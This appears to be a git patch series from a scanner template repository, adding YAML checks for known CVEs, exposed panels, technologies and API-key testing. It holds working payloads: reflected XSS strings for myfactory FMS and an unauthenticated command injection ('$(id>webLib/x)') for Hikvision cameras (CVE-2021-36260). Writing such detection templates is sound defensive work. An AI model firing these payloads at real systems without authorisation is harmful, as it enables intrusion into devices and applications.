| http | 2286 | +| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | +| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | +| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | +| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | +| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | +| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | +| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | +| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | **178 directories, 2459 files**. From bbe3e7b5422ce26d3aef7fca9b2a1d561deee01e Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 27 Oct 2021 20:08:59 +0530 Subject: [PATCH 3254/4083] Create CVE-2021-42566.yaml --- cves/2021/CVE-2021-42566.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2021/CVE-2021-42566.yaml diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42566.yaml new file mode 100644 index 0000000000..128cff7f83 --- /dev/null +++ b/cves/2021/CVE-2021-42566.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-42566 + +info: + author: madrobot + name: myfactory FMS - Reflected XSS + description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. + severity: medium + tags: cve,cve2021,myfactory,xss + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-41467 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3Cscript%3Ealert(1)%3C/script%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "<script>alert(1)</script>" + part: body + condition: and + + - type: word + words: + - "text/html" + part: header From 0675ba8c679aadb25b7dd41c88a79499933a9f8e Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 27 Oct 2021 20:10:59 +0530 Subject: [PATCH 3255/4083] Update and rename CVE-2021-42566.yaml to CVE-2021-42565.yaml --- cves/2021/{CVE-2021-42566.yaml => CVE-2021-42565.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename cves/2021/{CVE-2021-42566.yaml => CVE-2021-42565.yaml} (88%) diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42565.yaml similarity index 88% rename from cves/2021/CVE-2021-42566.yaml rename to cves/2021/CVE-2021-42565.yaml index 128cff7f83..7d8132bf90 100644 --- a/cves/2021/CVE-2021-42566.yaml +++ b/cves/2021/CVE-2021-42565.yaml @@ -1,9 +1,9 @@ -id: CVE-2021-42566 +id: CVE-2021-42565 info: author: madrobot name: myfactory FMS - Reflected XSS - description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. + description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter. severity: medium tags: cve,cve2021,myfactory,xss reference: @@ -12,7 +12,7 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 - cve-id: CVE-2021-41467 + cve-id: CVE-2021-42565 cwe-id: CWE-79 requests: From ca73e7597402163fd6ae5ddb1ff8428fb0c2cc05 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 27 Oct 2021 20:13:56 +0530 Subject: [PATCH 3256/4083] Create CVE-2021-42566.yaml --- cves/2021/CVE-2021-42566.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2021/CVE-2021-42566.yaml diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42566.yaml new file mode 100644 index 0000000000..ddab6b65ba --- /dev/null +++ b/cves/2021/CVE-2021-42566.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-42566 + +info: + author: madrobot + name: myfactory FMS - Reflected XSS + description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. + severity: medium + tags: cve,cve2021,myfactory,xss + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-42566 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - ";alert(1);//" + part: body + condition: and + + - type: word + words: + - "text/html" + part: header From dedf6060102691694419b6595e01db385c53802f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 28 Oct 2021 07:14:18 +0700 Subject: [PATCH 3257/4083] Create cooperhewitt.yaml --- token-spray/cooperhewitt.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 token-spray/cooperhewitt.yaml diff --git a/token-spray/cooperhewitt.yaml b/token-spray/cooperhewitt.yaml new file mode 100644 index 0000000000..e848a79dae --- /dev/null +++ b/token-spray/cooperhewitt.yaml @@ -0,0 +1,19 @@ +id: api-youtube + +info: + name: Cooper Hewitt API + author: daffainfo + reference: https://collection.cooperhewitt.org/api/methods/ + severity: info + tags: token-spray + +self-contained: true +requests: + - method: GET + path: + - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" + + matchers: + - type: status + status: + - 200 From e91e2e6e27e7be1e28b278942fa1b09c1bf74dbc Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 17:44:58 +0530 Subject: [PATCH 3258/4083] Added missing tag --- misconfiguration/application-yaml.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/application-yaml.yaml b/misconfiguration/application-yaml.yaml index f3f70248db..1565102728 100644 --- a/misconfiguration/application-yaml.yaml +++ b/misconfiguration/application-yaml.yaml @@ -5,6 +5,7 @@ info: author: Cristi vlad (@cristivlad25) severity: info description: Finds Application YAML files which often contain sensitive information. + tags: misconfig requests: - method: GET From d5bd05d6ab0cdb1d6822e90942eb099ce6892f99 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 28 Oct 2021 20:17:37 +0700 Subject: [PATCH 3259/4083] Create thecatapi.yaml --- token-spray/thecatapi.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 token-spray/thecatapi.yaml diff --git a/token-spray/thecatapi.yaml b/token-spray/thecatapi.yaml new file mode 100644 index 0000000000..fee792c413 --- /dev/null +++ b/token-spray/thecatapi.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-16278 + +info: + name: TheCatApi API Test + author: daffainfo + severity: info + reference: https://docs.thecatapi.com/ + tags: token-spray + +requests: + - raw: + - | + GET /v1/votes HTTP/1.1 + Host: {{Hostname}} + x-api-key: {{token}} + + matchers: + - type: status + negative: true + status: + - 401 From 47cddfcf0c42352a711aef9d4db621f8f02ab8aa Mon Sep 17 00:00:00 2001 From: commiter <commit@github.com> Date: Thu, 28 Oct 2021 22:28:04 +0800 Subject: [PATCH 3260/4083] [pulse secure VPN] add more possible paths --- exposed-panels/pulse-secure-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/pulse-secure-panel.yaml b/exposed-panels/pulse-secure-panel.yaml index 04b74a4464..7d444a4d38 100644 --- a/exposed-panels/pulse-secure-panel.yaml +++ b/exposed-panels/pulse-secure-panel.yaml @@ -10,6 +10,8 @@ requests: - method: GET path: - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" matchers-condition: or matchers: - type: word From 32a3bf9e621f50cc93d9499fa26306999de09fd7 Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 20:54:27 +0530 Subject: [PATCH 3261/4083] Update thecatapi.yaml --- token-spray/thecatapi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/token-spray/thecatapi.yaml b/token-spray/thecatapi.yaml index fee792c413..324bc31350 100644 --- a/token-spray/thecatapi.yaml +++ b/token-spray/thecatapi.yaml @@ -6,14 +6,14 @@ info: severity: info reference: https://docs.thecatapi.com/ tags: token-spray - + requests: - raw: - | GET /v1/votes HTTP/1.1 Host: {{Hostname}} x-api-key: {{token}} - + matchers: - type: status negative: true From 603d415aae6ba44c948c73b627812d97825a0a45 Mon Sep 17 00:00:00 2001 From: Jiheon <jiheon.unidev@gmail.com> Date: Fri, 29 Oct 2021 00:49:00 +0900 Subject: [PATCH 3262/4083] Added detect aws cloudfront service Template --- technologies/aws/aws-cloudfront-service.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/aws/aws-cloudfront-service.yaml diff --git a/technologies/aws/aws-cloudfront-service.yaml b/technologies/aws/aws-cloudfront-service.yaml new file mode 100644 index 0000000000..97948925c1 --- /dev/null +++ b/technologies/aws/aws-cloudfront-service.yaml @@ -0,0 +1,22 @@ +id: aws-cloudfront-service + +info: + name: Detect websites using AWS cloudfront service + author: jiheon-dev + severity: info + tags: aws,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "x-cache: Hit from cloudfront" + - "x-cache: RefreshHit from cloudfront" + - "x-cache: Miss from cloudfront" + - "x-cache: Error from cloudfront" + part: header + condition: or From 3d73725652cd0bc74cd82435c4d0d9f08299e20e Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 21:37:37 +0530 Subject: [PATCH 3263/4083] updated matcher to handle both cases --- technologies/aws/aws-cloudfront-service.yaml | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/technologies/aws/aws-cloudfront-service.yaml b/technologies/aws/aws-cloudfront-service.yaml index 97948925c1..539bc51605 100644 --- a/technologies/aws/aws-cloudfront-service.yaml +++ b/technologies/aws/aws-cloudfront-service.yaml @@ -1,10 +1,11 @@ id: aws-cloudfront-service info: - name: Detect websites using AWS cloudfront service + name: AWS Cloudfront service detection author: jiheon-dev severity: info tags: aws,tech + description: Detect websites using AWS cloudfront service requests: - method: GET @@ -12,11 +13,11 @@ requests: - "{{BaseURL}}" matchers: - - type: word - words: - - "x-cache: Hit from cloudfront" - - "x-cache: RefreshHit from cloudfront" - - "x-cache: Miss from cloudfront" - - "x-cache: Error from cloudfront" + - type: dsl part: header condition: or + dsl: + - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" \ No newline at end of file From b8c59421e3da336e5b0f5cf16f790690a5191915 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 21:39:14 +0530 Subject: [PATCH 3264/4083] removed unwanted part --- technologies/aws/aws-cloudfront-service.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/aws/aws-cloudfront-service.yaml b/technologies/aws/aws-cloudfront-service.yaml index 539bc51605..c7241b09d8 100644 --- a/technologies/aws/aws-cloudfront-service.yaml +++ b/technologies/aws/aws-cloudfront-service.yaml @@ -14,7 +14,6 @@ requests: matchers: - type: dsl - part: header condition: or dsl: - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" From 2c74326911e591de9af35f7e793d7a8bfd3dd878 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 21:42:39 +0530 Subject: [PATCH 3265/4083] misc update --- exposed-panels/pulse-secure-panel.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposed-panels/pulse-secure-panel.yaml b/exposed-panels/pulse-secure-panel.yaml index 7d444a4d38..33fe8a1e43 100644 --- a/exposed-panels/pulse-secure-panel.yaml +++ b/exposed-panels/pulse-secure-panel.yaml @@ -12,14 +12,16 @@ requests: - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" - "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi" - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" + + stop-at-first-match: true matchers-condition: or matchers: - type: word + part: header words: - "/dana-na/auth/welcome.cgi" - part: header - type: regex + part: body regex: - "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css" - part: body \ No newline at end of file From fa551b2be636f93b9185a1bc434bd6859abb8d07 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 28 Oct 2021 22:08:36 +0530 Subject: [PATCH 3266/4083] Update and rename thecatapi.yaml to api-thecatapi.yaml --- .../{thecatapi.yaml => api-thecatapi.yaml} | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) rename token-spray/{thecatapi.yaml => api-thecatapi.yaml} (54%) diff --git a/token-spray/thecatapi.yaml b/token-spray/api-thecatapi.yaml similarity index 54% rename from token-spray/thecatapi.yaml rename to token-spray/api-thecatapi.yaml index 324bc31350..f8399778d8 100644 --- a/token-spray/thecatapi.yaml +++ b/token-spray/api-thecatapi.yaml @@ -1,18 +1,19 @@ -id: CVE-2019-16278 +id: api-thecatapi info: name: TheCatApi API Test author: daffainfo severity: info reference: https://docs.thecatapi.com/ - tags: token-spray + tags: token-spray,thecatapi +self-contained: true requests: - - raw: - - | - GET /v1/votes HTTP/1.1 - Host: {{Hostname}} - x-api-key: {{token}} + - method: GET + path: + - "https://api.thecatapi.com/v1/votes" + headers: + x-api-key: "{{token}}" matchers: - type: status From 315e76f9ee8bf325f72e6d949c7da53965d2e911 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 28 Oct 2021 22:13:40 +0530 Subject: [PATCH 3267/4083] Update and rename cooperhewitt.yaml to api-cooperhewitt.yaml --- token-spray/{cooperhewitt.yaml => api-cooperhewitt.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename token-spray/{cooperhewitt.yaml => api-cooperhewitt.yaml} (86%) diff --git a/token-spray/cooperhewitt.yaml b/token-spray/api-cooperhewitt.yaml similarity index 86% rename from token-spray/cooperhewitt.yaml rename to token-spray/api-cooperhewitt.yaml index e848a79dae..339f8ed1b2 100644 --- a/token-spray/cooperhewitt.yaml +++ b/token-spray/api-cooperhewitt.yaml @@ -1,11 +1,11 @@ -id: api-youtube +id: api-cooperhewitt info: name: Cooper Hewitt API author: daffainfo - reference: https://collection.cooperhewitt.org/api/methods/ severity: info - tags: token-spray + reference: https://collection.cooperhewitt.org/api/methods/ + tags: token-spray,cooperhewitt self-contained: true requests: From 3f72d6e58d672a24383bd665e3b94ceb763628f5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 28 Oct 2021 13:37:43 -0500 Subject: [PATCH 3268/4083] Create binance-rest-api.yaml --- token-spray/binance-rest-api.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 token-spray/binance-rest-api.yaml diff --git a/token-spray/binance-rest-api.yaml b/token-spray/binance-rest-api.yaml new file mode 100644 index 0000000000..fcacd484de --- /dev/null +++ b/token-spray/binance-rest-api.yaml @@ -0,0 +1,25 @@ +id: binance-rest-api + +info: + name: Binance REST API Test + author: geeknik + severity: info + reference: https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md + tags: token-spray,binance + +self-contained: true +requests: + - method: GET + path: + - "https://api.binance.com/api/v3/historicalTrades" + headers: + X-MBX-APIKEY: "{{token}}" + + matchers: + - type: word + part: body + words: + - "Invalid API-key" + - "key format invalid" + condition: or + negative: true From 263fb400e966f4cb66d8ecca628f4b799955e62d Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 29 Oct 2021 00:22:29 +0530 Subject: [PATCH 3269/4083] Update CVE-2021-42566.yaml --- cves/2021/CVE-2021-42566.yaml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42566.yaml index ddab6b65ba..b8266aa918 100644 --- a/cves/2021/CVE-2021-42566.yaml +++ b/cves/2021/CVE-2021-42566.yaml @@ -1,25 +1,25 @@ id: CVE-2021-42566 info: - author: madrobot name: myfactory FMS - Reflected XSS - description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. + author: madrobot severity: medium - tags: cve,cve2021,myfactory,xss + description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-42566 cwe-id: CWE-79 + tags: cve,cve2021,myfactory,xss requests: - method: GET path: - - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F' - - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F' + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -28,12 +28,13 @@ requests: - 200 - type: word - words: - - ";alert(1);//" part: body + words: + - "</script><script>alert(document.domain)</script>" condition: and - type: word + part: header words: - "text/html" - part: header + From 7f9490d7624d6a0693d8800d91419108d983deef Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 29 Oct 2021 00:25:12 +0530 Subject: [PATCH 3270/4083] Update CVE-2021-42565.yaml --- cves/2021/CVE-2021-42565.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-42565.yaml b/cves/2021/CVE-2021-42565.yaml index 7d8132bf90..cf0a4645f8 100644 --- a/cves/2021/CVE-2021-42565.yaml +++ b/cves/2021/CVE-2021-42565.yaml @@ -3,9 +3,8 @@ id: CVE-2021-42565 info: author: madrobot name: myfactory FMS - Reflected XSS - description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter. severity: medium - tags: cve,cve2021,myfactory,xss + description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms @@ -14,12 +13,13 @@ info: cvss-score: 6.10 cve-id: CVE-2021-42565 cwe-id: CWE-79 + tags: cve,cve2021,myfactory,xss requests: - method: GET path: - - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3Cscript%3Ealert(1)%3C/script%3E' - - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3Cscript%3Ealert(1)%3C/script%3E' + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -28,12 +28,12 @@ requests: - 200 - type: word - words: - - "<script>alert(1)</script>" part: body + words: + - "</script><script>alert(document.domain)</script>" condition: and - type: word + part: header words: - "text/html" - part: header From e58e1ef96dff0b2ac32d7e10c5b75366d2f06622 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 29 Oct 2021 00:25:45 +0530 Subject: [PATCH 3271/4083] Update CVE-2021-42566.yaml --- cves/2021/CVE-2021-42566.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42566.yaml index b8266aa918..ce8fb35f82 100644 --- a/cves/2021/CVE-2021-42566.yaml +++ b/cves/2021/CVE-2021-42566.yaml @@ -37,4 +37,3 @@ requests: part: header words: - "text/html" - From ffee9148ad40feb457e0e942b73d297cb439e06d Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Fri, 29 Oct 2021 00:27:57 +0530 Subject: [PATCH 3272/4083] Update and rename binance-rest-api.yaml to api-binance.yaml --- token-spray/{binance-rest-api.yaml => api-binance.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename token-spray/{binance-rest-api.yaml => api-binance.yaml} (90%) diff --git a/token-spray/binance-rest-api.yaml b/token-spray/api-binance.yaml similarity index 90% rename from token-spray/binance-rest-api.yaml rename to token-spray/api-binance.yaml index fcacd484de..064b6f6f1d 100644 --- a/token-spray/binance-rest-api.yaml +++ b/token-spray/api-binance.yaml @@ -1,7 +1,7 @@ -id: binance-rest-api +id: api-binance info: - name: Binance REST API Test + name: Binance REST API author: geeknik severity: info reference: https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md From 8f4a90f33a6486ee3b72793a2b35c168c61fe6ea Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 13:47:09 +0530 Subject: [PATCH 3273/4083] Added Hikvision RCE (CVE-2021-36260) --- cves/2021/CVE-2021-36260.yaml | 47 +++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 cves/2021/CVE-2021-36260.yaml diff --git a/cves/2021/CVE-2021-36260.yaml b/cves/2021/CVE-2021-36260.yaml new file mode 100644 index 0000000000..85e67c2ede --- /dev/null +++ b/cves/2021/CVE-2021-36260.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-36260 + +info: + name: Unauthenticated Hikvision IP camera/NVR firmware RCE + author: pdteam + severity: critical + description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. + reference: + - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html + - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-36260 + - https://github.com/Aiminsun/CVE-2021-36260 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-36260 + cwe-id: CWE-77,CWE-20 + tags: cve,cve2021,hikvision,rce,iot,intrusive + +requests: + - raw: + - | + PUT /SDK/webLanguage HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + <?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/x)</language> + + - | + GET /x HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(body_2,'uid=') && contains(body_2,'gid=')" + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - "(u|g)id=.*" From f6576aa657c5541c5ba7005707a7dc83d22cb0f7 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 14:19:30 +0530 Subject: [PATCH 3274/4083] Added hikvision detection template --- technologies/hikvision-detection.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/hikvision-detection.yaml diff --git a/technologies/hikvision-detection.yaml b/technologies/hikvision-detection.yaml new file mode 100644 index 0000000000..7c6f18dda0 --- /dev/null +++ b/technologies/hikvision-detection.yaml @@ -0,0 +1,25 @@ +id: hikvision-detection + +info: + name: Hikvision Detection + author: pdteam + severity: info + tags: tech,hikvision + +requests: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/doc/page/login.asp" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + words: + - "Hikvision Digital Technology" + + - type: dsl + name: favicon + dsl: + - "status_code==200 && ('999357577' == mmh3(base64_py(body)))" \ No newline at end of file From 3ea77a318be7c01981dababf889c31b5a47411ed Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 14:22:12 +0530 Subject: [PATCH 3275/4083] Added Hikvision workflow --- workflows/hikvision-workflow.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 workflows/hikvision-workflow.yaml diff --git a/workflows/hikvision-workflow.yaml b/workflows/hikvision-workflow.yaml new file mode 100644 index 0000000000..95b090366a --- /dev/null +++ b/workflows/hikvision-workflow.yaml @@ -0,0 +1,12 @@ +id: hikvision-workflow + +info: + name: Hikvision Security Checks + author: pdteam + description: A simple workflow that runs all Hikvision related nuclei templates on a given target. + +workflows: + + - template: technologies/hikvision-detection.yaml + subtemplates: + - template: cves/2021/CVE-2021-36260.yaml \ No newline at end of file From a451cfb48a5157ac7d9d88c42efda23ef614c9e7 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 14:24:20 +0530 Subject: [PATCH 3276/4083] misc update --- cves/2021/CVE-2021-36260.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-36260.yaml b/cves/2021/CVE-2021-36260.yaml index 85e67c2ede..6d3276abe8 100644 --- a/cves/2021/CVE-2021-36260.yaml +++ b/cves/2021/CVE-2021-36260.yaml @@ -1,8 +1,8 @@ id: CVE-2021-36260 info: - name: Unauthenticated Hikvision IP camera/NVR firmware RCE - author: pdteam + name: Hikvision IP camera/NVR - Unauthenticated RCE + author: pdteam,gy741 severity: critical description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. reference: From f635c80512564a5d37fc6c530806f6d92d3010e9 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 14:49:58 +0530 Subject: [PATCH 3277/4083] Adding metadata --- cves/2021/CVE-2021-36260.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-36260.yaml b/cves/2021/CVE-2021-36260.yaml index 6d3276abe8..77c5592d49 100644 --- a/cves/2021/CVE-2021-36260.yaml +++ b/cves/2021/CVE-2021-36260.yaml @@ -15,6 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36260 cwe-id: CWE-77,CWE-20 + metadata: + shodan-query: http.favicon.hash:999357577 tags: cve,cve2021,hikvision,rce,iot,intrusive requests: From 4024822ddff966405147aeb80657b82459bc7f1c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 15:56:24 +0530 Subject: [PATCH 3278/4083] misc updates --- cves/2017/CVE-2017-0929.yaml | 20 ++++++++++++++------ 1 file changed, 14 insertions(+), 6 deletions(-) diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml index ebe7ad1e9c..bd7c9bcac5 100644 --- a/cves/2017/CVE-2017-0929.yaml +++ b/cves/2017/CVE-2017-0929.yaml @@ -1,24 +1,32 @@ id: CVE-2017-0929 + info: - name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) + name: DotNetNuke ImageHandler SSRF + author: charanrayudu,meme-lord severity: high + description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources. reference: - https://hackerone.com/reports/482634 - author: CharanRayudu, meme-lord - tags: cve,cve2017,ssrf,dotnetnuke + - https://nvd.nist.gov/vuln/detail/CVE-2017-0929 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2017-0929 cwe-id: CWE-918 - description: "DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources." + tags: cve,cve2017,oast,ssrf,dnn requests: - method: GET 